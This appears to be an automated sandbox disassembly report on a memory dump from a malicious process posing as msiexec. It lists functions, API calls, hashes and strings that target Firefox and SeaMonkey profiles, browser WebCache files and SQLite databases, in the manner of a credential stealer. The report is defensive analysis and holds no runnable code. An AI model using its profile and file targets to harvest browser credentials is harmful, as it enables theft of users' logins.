                                                                            Function 00403E2D Relevance: 12.1, APIs: 6, Strings: 2, Instructions: 121COMMON
                                                                            Download Yara Rule
                                                                            APIs
                                                                            • memset.MSVCRT ref: 00403E50
                                                                            • memset.MSVCRT ref: 00403E65
                                                                            • memset.MSVCRT ref: 00403E7A
                                                                            • memset.MSVCRT ref: 00403E8F
                                                                            • memset.MSVCRT ref: 00403EA4
                                                                              • Part of subcall function 00414C2E: memset.MSVCRT ref: 00414C87
                                                                              • Part of subcall function 00414C2E: wcscpy.MSVCRT ref: 00414CFC
                                                                              • Part of subcall function 00409D1F: wcslen.MSVCRT ref: 00409D29
                                                                              • Part of subcall function 00409D1F: wcslen.MSVCRT ref: 00409D33
                                                                              • Part of subcall function 00409D1F: wcscpy.MSVCRT ref: 00409D47
                                                                              • Part of subcall function 00409D1F: wcscat.MSVCRT ref: 00409D55
                                                                              • Part of subcall function 0040414F: memset.MSVCRT ref: 00404172
                                                                              • Part of subcall function 0040414F: wcscpy.MSVCRT ref: 004041D6
                                                                              • Part of subcall function 0040414F: wcscpy.MSVCRT ref: 004041E7
                                                                              • Part of subcall function 0040414F: memset.MSVCRT ref: 00404200
                                                                              • Part of subcall function 0040414F: memset.MSVCRT ref: 00404215
                                                                              • Part of subcall function 0040414F: _snwprintf.MSVCRT ref: 0040422F
                                                                              • Part of subcall function 0040414F: wcscpy.MSVCRT ref: 00404242
                                                                            • memset.MSVCRT ref: 00403F6B
                                                                              • Part of subcall function 004099C6: wcslen.MSVCRT ref: 004099CD
                                                                              • Part of subcall function 004099C6: memcpy.MSVCRT(?,?,00000104,?,0040BAA5,00445FAE), ref: 004099E3
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 0000000A.00000002.3297636694.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_10_2_400000_msiexec.jbxd
                                                                            Similarity
                                                                            • API ID: memset$wcscpy$wcslen$_snwprintfmemcpywcscat
                                                                            • String ID: Mozilla\SeaMonkey$Mozilla\SeaMonkey\Profiles
                                                                            • API String ID: 1829478387-2068335096
                                                                            • Opcode ID: 4e0f951fde323d6a6ece029bc301e1d43e2d4c472937678d86f27e99a49f71a6
                                                                            • Instruction ID: badb9319ce56d3a3e0b5d4601891faab39f88fc9b3936f94b46873e2979bc7df
                                                                            • Opcode Fuzzy Hash: 4e0f951fde323d6a6ece029bc301e1d43e2d4c472937678d86f27e99a49f71a6
                                                                            • Instruction Fuzzy Hash: F94133B294012CBADB20EB56DC85FCF777CAF85314F1180A7B509F2181DA785B848F6A
                                                                            Function 00403FBE Relevance: 12.1, APIs: 6, Strings: 2, Instructions: 121COMMON
                                                                            Download Yara Rule
                                                                            APIs
                                                                            • memset.MSVCRT ref: 00403FE1
                                                                            • memset.MSVCRT ref: 00403FF6
                                                                            • memset.MSVCRT ref: 0040400B
                                                                            • memset.MSVCRT ref: 00404020
                                                                            • memset.MSVCRT ref: 00404035
                                                                              • Part of subcall function 00414C2E: memset.MSVCRT ref: 00414C87
                                                                              • Part of subcall function 00414C2E: wcscpy.MSVCRT ref: 00414CFC
                                                                              • Part of subcall function 00409D1F: wcslen.MSVCRT ref: 00409D29
                                                                              • Part of subcall function 00409D1F: wcslen.MSVCRT ref: 00409D33
                                                                              • Part of subcall function 00409D1F: wcscpy.MSVCRT ref: 00409D47
                                                                              • Part of subcall function 00409D1F: wcscat.MSVCRT ref: 00409D55
                                                                              • Part of subcall function 0040414F: memset.MSVCRT ref: 00404172
                                                                              • Part of subcall function 0040414F: wcscpy.MSVCRT ref: 004041D6
                                                                              • Part of subcall function 0040414F: wcscpy.MSVCRT ref: 004041E7
                                                                              • Part of subcall function 0040414F: memset.MSVCRT ref: 00404200
                                                                              • Part of subcall function 0040414F: memset.MSVCRT ref: 00404215
                                                                              • Part of subcall function 0040414F: _snwprintf.MSVCRT ref: 0040422F
                                                                              • Part of subcall function 0040414F: wcscpy.MSVCRT ref: 00404242
                                                                            • memset.MSVCRT ref: 004040FC
                                                                              • Part of subcall function 004099C6: wcslen.MSVCRT ref: 004099CD
                                                                              • Part of subcall function 004099C6: memcpy.MSVCRT(?,?,00000104,?,0040BAA5,00445FAE), ref: 004099E3
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 0000000A.00000002.3297636694.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_10_2_400000_msiexec.jbxd
                                                                            Similarity
                                                                            • API ID: memset$wcscpy$wcslen$_snwprintfmemcpywcscat
                                                                            • String ID: Mozilla\Firefox$Mozilla\Firefox\Profiles
                                                                            • API String ID: 1829478387-3369679110
                                                                            • Opcode ID: e8b210b2701fced3ec1563677da70e7bdaed7d27e85ea88c95246b73557c45d8
                                                                            • Instruction ID: a33c26704871042caa7cb74448a1974e70df039046fe21947f04a6d8cbe9f93a
                                                                            • Opcode Fuzzy Hash: e8b210b2701fced3ec1563677da70e7bdaed7d27e85ea88c95246b73557c45d8
                                                                            • Instruction Fuzzy Hash: 354134B294012CBADB20EB56DC85ECF777CAF85314F1180A7B509B3181EA745B948F6A
                                                                            Function 00444432 Relevance: 10.7, APIs: 1, Strings: 6, Instructions: 217COMMON
                                                                            Download Yara Rule
                                                                            APIs
                                                                            • memcpy.MSVCRT(00000048,00451D40,0000002C,000003FF,00445FAE,?,00000000,?,0040B879), ref: 004444E3
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 0000000A.00000002.3297636694.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_10_2_400000_msiexec.jbxd
                                                                            Similarity
                                                                            • API ID: memcpy
                                                                            • String ID: BINARY$NOCASE$RTRIM$main$no such vfs: %s$temp
                                                                            • API String ID: 3510742995-2641926074
                                                                            • Opcode ID: 821e0fdd347fba4e0959882d1eed221cd0f9849de050a87fd0c537b7ccc40074
                                                                            • Instruction ID: 565814064bb2237b40e40c3ad6633df45ffc5137317807aec9a32ad89077b3bf
                                                                            • Opcode Fuzzy Hash: 821e0fdd347fba4e0959882d1eed221cd0f9849de050a87fd0c537b7ccc40074
                                                                            • Instruction Fuzzy Hash: BA7119B1600701BFE710AF16CC81B66B7A8BB85319F11452FF4189B742D7BDED908B99
                                                                            Function 0041837F Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 140fileCOMMON
                                                                            Download Yara Rule
                                                                            APIs
                                                                            • CreateFileW.KERNELBASE(?,-7FBE829D,00000003,00000000,?,?,00000000), ref: 00418457
                                                                            • GetLastError.KERNEL32 ref: 0041847E
                                                                            • free.MSVCRT ref: 0041848B
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 0000000A.00000002.3297636694.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_10_2_400000_msiexec.jbxd
                                                                            Similarity
                                                                            • API ID: CreateErrorFileLastfree
                                                                            • String ID: |A
                                                                            • API String ID: 981974120-1717621600
                                                                            • Opcode ID: b73738cfafb11dafaf653c45b8d30767a4f0487cb759c2014a2d8a4f30590433
                                                                            • Instruction ID: 73005d91fce95ddd83c4435d1527c7398ec28b7193468e33704956b81d718a95
                                                                            • Opcode Fuzzy Hash: b73738cfafb11dafaf653c45b8d30767a4f0487cb759c2014a2d8a4f30590433
                                                                            • Instruction Fuzzy Hash: 50412472508306AFD710CF25DC4179BBBE5FF84328F14492EF8A492290EB78D9448B96
                                                                            Function 004032B4 Relevance: 10.6, APIs: 4, Strings: 2, Instructions: 119COMMON
                                                                            Download Yara Rule
                                                                            APIs
                                                                              • Part of subcall function 0040B633: free.MSVCRT ref: 0040B63A
                                                                              • Part of subcall function 0044553B: memset.MSVCRT ref: 004455C2
                                                                              • Part of subcall function 0044553B: wcsrchr.MSVCRT ref: 004455DA
                                                                            • memset.MSVCRT ref: 004033B7
                                                                            • memcpy.MSVCRT(?,00000000,0000121C), ref: 004033D0
                                                                            • wcscmp.MSVCRT ref: 004033FC
                                                                            • _wcsicmp.MSVCRT ref: 00403439
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 0000000A.00000002.3297636694.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_10_2_400000_msiexec.jbxd
                                                                            Similarity
                                                                            • API ID: memset$_wcsicmpfreememcpywcscmpwcsrchr
                                                                            • String ID: $0.@
                                                                            • API String ID: 2758756878-1896041820
                                                                            • Opcode ID: f66ff37cfebf4588bd42dffc34473b3fc2588101413319c72ad25ea5b69c0f44
                                                                            • Instruction ID: ab192eb15c9642abc1a13bae453f9d52c7669558764b377fc560e22e349fc473
                                                                            • Opcode Fuzzy Hash: f66ff37cfebf4588bd42dffc34473b3fc2588101413319c72ad25ea5b69c0f44
                                                                            • Instruction Fuzzy Hash: 6B414A71A0C3819BD770EF65C885A8BB7E8AF86314F004D2FE48C97681DB3899458B5B
                                                                            Function 004449B9 Relevance: 10.6, APIs: 7, Instructions: 61libraryloaderCOMMON
                                                                            Download Yara Rule
                                                                            APIs
                                                                              • Part of subcall function 0040A804: memset.MSVCRT ref: 0040A824
                                                                              • Part of subcall function 0040A804: GetSystemDirectoryW.KERNEL32(0045DE68,00000104), ref: 0040A841
                                                                              • Part of subcall function 0040A804: wcscpy.MSVCRT ref: 0040A854
                                                                              • Part of subcall function 0040A804: wcscat.MSVCRT ref: 0040A86A
                                                                              • Part of subcall function 0040A804: LoadLibraryW.KERNELBASE(00000000,?,?,?,?,?,?,?), ref: 0040A87B
                                                                              • Part of subcall function 0040A804: LoadLibraryW.KERNEL32(?,?,?,?,?,?,?,?), ref: 0040A884
                                                                            • GetProcAddress.KERNEL32(00000000,00000000), ref: 004449E7
                                                                            • GetProcAddress.KERNEL32(00000000,00000000), ref: 004449F8
                                                                            • GetProcAddress.KERNEL32(00000000,00000000), ref: 00444A09
                                                                            • GetProcAddress.KERNEL32(00000000,00000000), ref: 00444A1A
                                                                            • GetProcAddress.KERNEL32(00000000,00000000), ref: 00444A2B
                                                                            • GetProcAddress.KERNEL32(00000000,00000000), ref: 00444A3C
                                                                            • GetProcAddress.KERNEL32(00000000,00000000), ref: 00444A4D
                                                                            Memory Dump Source
                                                                            • Source File: 0000000A.00000002.3297636694.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_10_2_400000_msiexec.jbxd
                                                                            Similarity
                                                                            • API ID: AddressProc$LibraryLoad$DirectorySystemmemsetwcscatwcscpy
                                                                            • String ID:
                                                                            • API String ID: 2941347001-0
                                                                            • Opcode ID: 71f7015b8efbcabf0d8a3174310d871b9f234e636c99dab6741889365bf8ff35
                                                                            • Instruction ID: 45112ec7679d7541be2eaee67b01953ccf91f0241e5cd71b41190719d78dca83
                                                                            • Opcode Fuzzy Hash: 71f7015b8efbcabf0d8a3174310d871b9f234e636c99dab6741889365bf8ff35
                                                                            • Instruction Fuzzy Hash: 2E115871840700EDEA207F72DD0FF2B7AA5EF40B14F10882EF555594E1EBB6A8119E9C
                                                                            Function 00403BED Relevance: 9.1, APIs: 4, Strings: 2, Instructions: 57COMMON
                                                                            Download Yara Rule
                                                                            APIs
                                                                            • memset.MSVCRT ref: 00403C09
                                                                            • memset.MSVCRT ref: 00403C1E
                                                                              • Part of subcall function 00409719: wcslen.MSVCRT ref: 0040971A
                                                                              • Part of subcall function 00409719: wcscat.MSVCRT ref: 00409732
                                                                            • wcscat.MSVCRT ref: 00403C47
                                                                              • Part of subcall function 00414C2E: memset.MSVCRT ref: 00414C87
                                                                              • Part of subcall function 00414C2E: wcscpy.MSVCRT ref: 00414CFC
                                                                            • wcscat.MSVCRT ref: 00403C70
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 0000000A.00000002.3297636694.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_10_2_400000_msiexec.jbxd
                                                                            Similarity
                                                                            • API ID: memsetwcscat$wcscpywcslen
                                                                            • String ID: Mozilla\Firefox\Profiles$Mozilla\Profiles
                                                                            • API String ID: 2489821370-1174173950
                                                                            • Opcode ID: 5af024c53119846c6cf23d5d39710aba0b9f01952ad673d04fbaa3fd9d46c714
                                                                            • Instruction ID: 5219a381a5be6f9fff484f4b9c8ff18b49dc44b18064e24db21ac924a7a96902
                                                                            • Opcode Fuzzy Hash: 5af024c53119846c6cf23d5d39710aba0b9f01952ad673d04fbaa3fd9d46c714
                                                                            • Instruction Fuzzy Hash: 4401A9B294032C76DB207B669C86ECF672C9F45358F01447FB504B7182D9785E844AA9
                                                                            Function 0040A804 Relevance: 9.0, APIs: 6, Instructions: 40libraryCOMMON
                                                                            Download Yara Rule
                                                                            APIs
                                                                            • memset.MSVCRT ref: 0040A824
                                                                            • GetSystemDirectoryW.KERNEL32(0045DE68,00000104), ref: 0040A841
                                                                            • wcscpy.MSVCRT ref: 0040A854
                                                                            • wcscat.MSVCRT ref: 0040A86A
                                                                            • LoadLibraryW.KERNELBASE(00000000,?,?,?,?,?,?,?), ref: 0040A87B
                                                                            • LoadLibraryW.KERNEL32(?,?,?,?,?,?,?,?), ref: 0040A884
                                                                            Memory Dump Source
                                                                            • Source File: 0000000A.00000002.3297636694.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_10_2_400000_msiexec.jbxd
                                                                            Similarity
                                                                            • API ID: LibraryLoad$DirectorySystemmemsetwcscatwcscpy
                                                                            • String ID:
                                                                            • API String ID: 669240632-0
                                                                            • Opcode ID: 82c8cf326d92d3b179650df20de3df9a559229a48382c0fcbe0adb46b34a8860
                                                                            • Instruction ID: 21688b76284891f368be2c5f4feed5723597baa153f24eadc702144372ba9d0b
                                                                            • Opcode Fuzzy Hash: 82c8cf326d92d3b179650df20de3df9a559229a48382c0fcbe0adb46b34a8860
                                                                            • Instruction Fuzzy Hash: A6F0A472D0022467DF207B65AC46B8A3B6CBF01754F008072F908B71D2EB789A55CFDA
                                                                            Function 0041443E Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 43COMMON
                                                                            Download Yara Rule
                                                                            APIs
                                                                            • wcschr.MSVCRT ref: 00414458
                                                                            • _snwprintf.MSVCRT ref: 0041447D
                                                                            • WritePrivateProfileStringW.KERNEL32(?,?,?,?), ref: 0041449B
                                                                            • GetPrivateProfileStringW.KERNEL32(?,?,?,?,?,?), ref: 004144B3
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 0000000A.00000002.3297636694.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_10_2_400000_msiexec.jbxd
                                                                            Similarity
                                                                            • API ID: PrivateProfileString$Write_snwprintfwcschr
                                                                            • String ID: "%s"
                                                                            • API String ID: 1343145685-3297466227
                                                                            • Opcode ID: 946b4c1fd7f9a1c82d4bd3564eada2d63785a77446bf9af388738d4a416c1506
                                                                            • Instruction ID: 05c1b6e2b8d8aed92df8b5d38884bf02313f678dea9e3ece4dcd1a0b753c0483
                                                                            • Opcode Fuzzy Hash: 946b4c1fd7f9a1c82d4bd3564eada2d63785a77446bf9af388738d4a416c1506
                                                                            • Instruction Fuzzy Hash: 7201AD3240421ABBEF219F81DC09FDB3F6AFF09305F14806ABA08501A1D339C5A5EB58
                                                                            Function 00413CA4 Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 27libraryloadertimeCOMMON
                                                                            Download Yara Rule
                                                                            APIs
                                                                            • GetModuleHandleW.KERNEL32(kernel32.dll,?,00413EA2,?,?,?,?,?,00000000,?), ref: 00413CB5
                                                                            • GetProcAddress.KERNEL32(00000000,GetProcessTimes), ref: 00413CCF
                                                                            • GetProcessTimes.KERNELBASE(00000000,?,?,?,?,?,00413EA2,?,?,?,?,?,00000000,?), ref: 00413CF2
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 0000000A.00000002.3297636694.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_10_2_400000_msiexec.jbxd
                                                                            Similarity
                                                                            • API ID: AddressHandleModuleProcProcessTimes
                                                                            • String ID: GetProcessTimes$kernel32.dll
                                                                            • API String ID: 1714573020-3385500049
                                                                            • Opcode ID: 3d2a63fc8b7889f90c1cc675bbb66959c3424aca663c91e440c9d47c6094dacc
                                                                            • Instruction ID: 0a9fc9a7fb2a98cd878f934f387e3824ef844cc6c25aa3dbb33b58617c33e237
                                                                            • Opcode Fuzzy Hash: 3d2a63fc8b7889f90c1cc675bbb66959c3424aca663c91e440c9d47c6094dacc
                                                                            • Instruction Fuzzy Hash: F5F03036204309AFEF008FA6FD06B963BA8BB04742F044066FA0CD1561D7B5D6B0EF99
                                                                            Function 004087B3 Relevance: 7.7, APIs: 6, Instructions: 190COMMON
                                                                            Download Yara Rule
                                                                            APIs
                                                                            • memset.MSVCRT ref: 004087D6
                                                                              • Part of subcall function 0040A6E6: WideCharToMultiByte.KERNEL32(0000FDE9,00000000,000003FF,000000FF,00000000,000003FF,00000000,00000000,0040B866,00445FAE,?,?,?,?,?,?), ref: 0040A6FF
                                                                              • Part of subcall function 004095D9: memset.MSVCRT ref: 004095FC
                                                                            • memset.MSVCRT ref: 00408828
                                                                            • memset.MSVCRT ref: 00408840
                                                                            • memset.MSVCRT ref: 00408858
                                                                            • memset.MSVCRT ref: 00408870
                                                                            • memset.MSVCRT ref: 00408888
                                                                              • Part of subcall function 00409D1F: wcslen.MSVCRT ref: 00409D29
                                                                              • Part of subcall function 00409D1F: wcslen.MSVCRT ref: 00409D33
                                                                              • Part of subcall function 00409D1F: wcscpy.MSVCRT ref: 00409D47
                                                                              • Part of subcall function 00409D1F: wcscat.MSVCRT ref: 00409D55
                                                                              • Part of subcall function 00409B98: GetFileAttributesW.KERNELBASE(?,00445E12,?,?,?,00000104), ref: 00409B9C
                                                                            Memory Dump Source
                                                                            • Source File: 0000000A.00000002.3297636694.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_10_2_400000_msiexec.jbxd
                                                                            Similarity
                                                                            • API ID: memset$wcslen$AttributesByteCharFileMultiWidewcscatwcscpy
                                                                            • String ID:
                                                                            • API String ID: 2911713577-0
                                                                            • Opcode ID: 01acc2a10158501d086df2ecf85720ba35c535a6b148720ad12018c66e71fd5d
                                                                            • Instruction ID: a7e5ca25de4111a2a05fe91eb9e7b9268c7acadad77a1a504b595fc773a76dc1
                                                                            • Opcode Fuzzy Hash: 01acc2a10158501d086df2ecf85720ba35c535a6b148720ad12018c66e71fd5d
                                                                            • Instruction Fuzzy Hash: BD5146B280011D7EEB50E751DC46EEF776CDF05318F0040BEB948B6182EA745F948BA9
                                                                            Function 0041F1A5 Relevance: 7.7, APIs: 3, Strings: 2, Instructions: 165COMMON
                                                                            Download Yara Rule
                                                                            APIs
                                                                            • memcmp.MSVCRT(?,?,00000004,?,00000065,004381DF,00000065,00000000,00000007,?,00000000), ref: 0041F202
                                                                            • memcmp.MSVCRT(?,SQLite format 3,00000010,?,00000065,004381DF,00000065,00000000), ref: 0041F22D
                                                                            • memcmp.MSVCRT(?,@ ,00000003,?,?,00000065,004381DF,00000065,00000000), ref: 0041F299
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 0000000A.00000002.3297636694.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_10_2_400000_msiexec.jbxd
                                                                            Similarity
                                                                            • API ID: memcmp
                                                                            • String ID: @ $SQLite format 3
                                                                            • API String ID: 1475443563-3708268960
                                                                            • Opcode ID: 82854fe69cd6f085c01fb16587ca6c24c159481fbb1fdb23c3f30c43337b22d0
                                                                            • Instruction ID: a5e199d7c3355b23248e204991ed7883f9cb1cefd3641e4a8180bf992d12f390
                                                                            • Opcode Fuzzy Hash: 82854fe69cd6f085c01fb16587ca6c24c159481fbb1fdb23c3f30c43337b22d0
                                                                            • Instruction Fuzzy Hash: 9051C1719002199BDF10DFA9C4817DEB7F4AF44314F1541AAEC14EB246E778EA8ACB88
                                                                            Function 004110DC Relevance: 7.1, APIs: 2, Strings: 2, Instructions: 68COMMON
                                                                            Download Yara Rule
                                                                            APIs
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 0000000A.00000002.3297636694.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_10_2_400000_msiexec.jbxd
                                                                            Similarity
                                                                            • API ID: _wcsicmpqsort
                                                                            • String ID: /nosort$/sort
                                                                            • API String ID: 1579243037-1578091866
                                                                            • Opcode ID: 82532bcf7625f57df0476c9ea77f38d24af0b860564a5aebd85b14b7cf50dee8
                                                                            • Instruction ID: 59a4a6edbc2c6816dd96362f3638b70d105e8990563e463c72bda517b6347aa4
                                                                            • Opcode Fuzzy Hash: 82532bcf7625f57df0476c9ea77f38d24af0b860564a5aebd85b14b7cf50dee8
                                                                            • Instruction Fuzzy Hash: C8213770700201AFD714FB36C880E96F3AAFF58314F11012EE61897692DB39BC918B4A
                                                                            Function 0040E5ED Relevance: 6.1, APIs: 2, Strings: 2, Instructions: 61COMMON
                                                                            Download Yara Rule
                                                                            APIs
                                                                            • memset.MSVCRT ref: 0040E60F
                                                                            • memset.MSVCRT ref: 0040E629
                                                                              • Part of subcall function 00409D1F: wcslen.MSVCRT ref: 00409D29
                                                                              • Part of subcall function 00409D1F: wcslen.MSVCRT ref: 00409D33
                                                                              • Part of subcall function 00409D1F: wcscpy.MSVCRT ref: 00409D47
                                                                              • Part of subcall function 00409D1F: wcscat.MSVCRT ref: 00409D55
                                                                              • Part of subcall function 00409B98: GetFileAttributesW.KERNELBASE(?,00445E12,?,?,?,00000104), ref: 00409B9C
                                                                            Strings
                                                                            • Microsoft\Windows\WebCache\WebCacheV01.dat, xrefs: 0040E647
                                                                            • Microsoft\Windows\WebCache\WebCacheV24.dat, xrefs: 0040E66F
                                                                            Memory Dump Source
                                                                            • Source File: 0000000A.00000002.3297636694.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_10_2_400000_msiexec.jbxd
                                                                            Similarity
                                                                            • API ID: memsetwcslen$AttributesFilewcscatwcscpy
                                                                            • String ID: Microsoft\Windows\WebCache\WebCacheV01.dat$Microsoft\Windows\WebCache\WebCacheV24.dat
                                                                            • API String ID: 3354267031-2114579845
                                                                            • Opcode ID: 74f633d4b8b79b581db03fb52a9a183d925aa75474fb6f674f7548ec87be104c
                                                                            • Instruction ID: 2f29c334d396001d9fe1cebc89c879271eb53039ccc8e03d5a3365d75131e7c5
                                                                            • Opcode Fuzzy Hash: 74f633d4b8b79b581db03fb52a9a183d925aa75474fb6f674f7548ec87be104c
                                                                            • Instruction Fuzzy Hash: 66118AB3D4012C66EB10E755EC85FDB73ACAF14319F1408B7B904F11C2E6B89F984998
                                                                            Function 0043A9F6 Relevance: 5.5, APIs: 2, Strings: 1, Instructions: 979COMMON
                                                                            Download Yara Rule
                                                                            APIs
                                                                            Strings
                                                                            • only a single result allowed for a SELECT that is part of an expression, xrefs: 0043AAD3
                                                                            Memory Dump Source
                                                                            • Source File: 0000000A.00000002.3297636694.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_10_2_400000_msiexec.jbxd
                                                                            Similarity
                                                                            • API ID: memset
                                                                            • String ID: only a single result allowed for a SELECT that is part of an expression
                                                                            • API String ID: 2221118986-1725073988
                                                                            • Opcode ID: f2ccd9f22684a9d505166f2bd917588c88a2d89474e41d8808a21707a3bb0a12
                                                                            • Instruction ID: 0c5fbdb45af1b87466ede92b40025f4dfba1e1eb7e0419b48c64bc8603b8f36f
                                                                            • Opcode Fuzzy Hash: f2ccd9f22684a9d505166f2bd917588c88a2d89474e41d8808a21707a3bb0a12
                                                                            • Instruction Fuzzy Hash: 5D827A71608340AFD720DF15C881B1BBBE1FF88318F14491EFA9987262D779E954CB96
                                                                            Function 00444B06 Relevance: 4.6, APIs: 1, Strings: 2, Instructions: 108COMMON
                                                                            Download Yara Rule
                                                                            APIs
                                                                              • Part of subcall function 004449B9: GetProcAddress.KERNEL32(00000000,00000000), ref: 004449E7
                                                                              • Part of subcall function 004449B9: GetProcAddress.KERNEL32(00000000,00000000), ref: 004449F8
                                                                              • Part of subcall function 004449B9: GetProcAddress.KERNEL32(00000000,00000000), ref: 00444A09
                                                                              • Part of subcall function 004449B9: GetProcAddress.KERNEL32(00000000,00000000), ref: 00444A1A
                                                                              • Part of subcall function 004449B9: GetProcAddress.KERNEL32(00000000,00000000), ref: 00444A2B
                                                                              • Part of subcall function 004449B9: GetProcAddress.KERNEL32(00000000,00000000), ref: 00444A3C
                                                                              • Part of subcall function 004449B9: GetProcAddress.KERNEL32(00000000,00000000), ref: 00444A4D
                                                                            • memcmp.MSVCRT(?,0044EC68,00000010,?,00000000,?), ref: 00444BA5
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 0000000A.00000002.3297636694.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_10_2_400000_msiexec.jbxd
                                                                            Similarity
                                                                            • API ID: AddressProc$memcmp
                                                                            • String ID: $$8
                                                                            • API String ID: 2808797137-435121686
                                                                            • Opcode ID: e80885fdbb6a557c0c44277052daa68a3f3074bd67b4db13da85d3ecc8de475b
                                                                            • Instruction ID: 2c4e4273d6b09173b98ec99ba1a72f96ebc6587eba5c15334d9e54441f883a66
                                                                            • Opcode Fuzzy Hash: e80885fdbb6a557c0c44277052daa68a3f3074bd67b4db13da85d3ecc8de475b
                                                                            • Instruction Fuzzy Hash: 04314171A00209ABEB10DFA6CDC1BAEB7B9FF88314F11055AE515A3241D778ED048B69
                                                                            Function 0040E4B2 Relevance: 4.6, APIs: 3, Instructions: 87fileCOMMON
                                                                            Download Yara Rule
                                                                            APIs
                                                                              • Part of subcall function 0040E01E: OpenProcess.KERNEL32(00000040,00000000,00000000,00000104,?,00000000,00000104,?,00000000,00000104,00000000), ref: 0040E093
                                                                              • Part of subcall function 0040E01E: GetCurrentProcess.KERNEL32(?,80000000,00000000,00000000), ref: 0040E0B2
                                                                              • Part of subcall function 0040E01E: DuplicateHandle.KERNELBASE(?,00000104,00000000), ref: 0040E0BF
                                                                              • Part of subcall function 0040E01E: GetFileSize.KERNEL32(?,00000000), ref: 0040E0D4
                                                                              • Part of subcall function 0040E01E: CreateFileMappingW.KERNELBASE(?,00000000,00000002,00000000,00000000,00000000), ref: 0040E0FE
                                                                              • Part of subcall function 0040E01E: MapViewOfFile.KERNELBASE(00000000,00000004,00000000,00000000,00000104), ref: 0040E113
                                                                              • Part of subcall function 0040E01E: WriteFile.KERNELBASE(00000000,00000000,00000104,0040E6A3,00000000), ref: 0040E12E
                                                                              • Part of subcall function 0040E01E: UnmapViewOfFile.KERNEL32(00000000), ref: 0040E135
                                                                              • Part of subcall function 0040E01E: CloseHandle.KERNELBASE(?), ref: 0040E13E
                                                                            • CloseHandle.KERNELBASE(000000FF,000000FF,00000000,?,0040E6A3,000000FF,?,00000104,00000000), ref: 0040E582
                                                                              • Part of subcall function 0040E2AB: memset.MSVCRT ref: 0040E380
                                                                              • Part of subcall function 0040E2AB: wcschr.MSVCRT ref: 0040E3B8
                                                                              • Part of subcall function 0040E2AB: memcpy.MSVCRT(?,-00000121,00000008,0044E518,00000000,00000000,75922EE0), ref: 0040E3EC
                                                                            • DeleteFileW.KERNELBASE(?,?,0040E6A3,000000FF,?,00000104,00000000), ref: 0040E5A3
                                                                            • CloseHandle.KERNEL32(000000FF,?,0040E6A3,000000FF,?,00000104,00000000), ref: 0040E5CA
                                                                              • Part of subcall function 0040E175: memset.MSVCRT ref: 0040E1BD
                                                                              • Part of subcall function 0040E175: _snwprintf.MSVCRT ref: 0040E257
                                                                              • Part of subcall function 0040E175: free.MSVCRT ref: 0040E28B
                                                                            Memory Dump Source
                                                                            • Source File: 0000000A.00000002.3297636694.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_10_2_400000_msiexec.jbxd
                                                                            Similarity
                                                                            • API ID: File$Handle$Close$ProcessViewmemset$CreateCurrentDeleteDuplicateMappingOpenSizeUnmapWrite_snwprintffreememcpywcschr
                                                                            • String ID:
                                                                            • API String ID: 1979745280-0
                                                                            • Opcode ID: 8c4b04af935ef543e183fc2d5fdeec50da417ae7152dfd79b37e36c3b45d6897
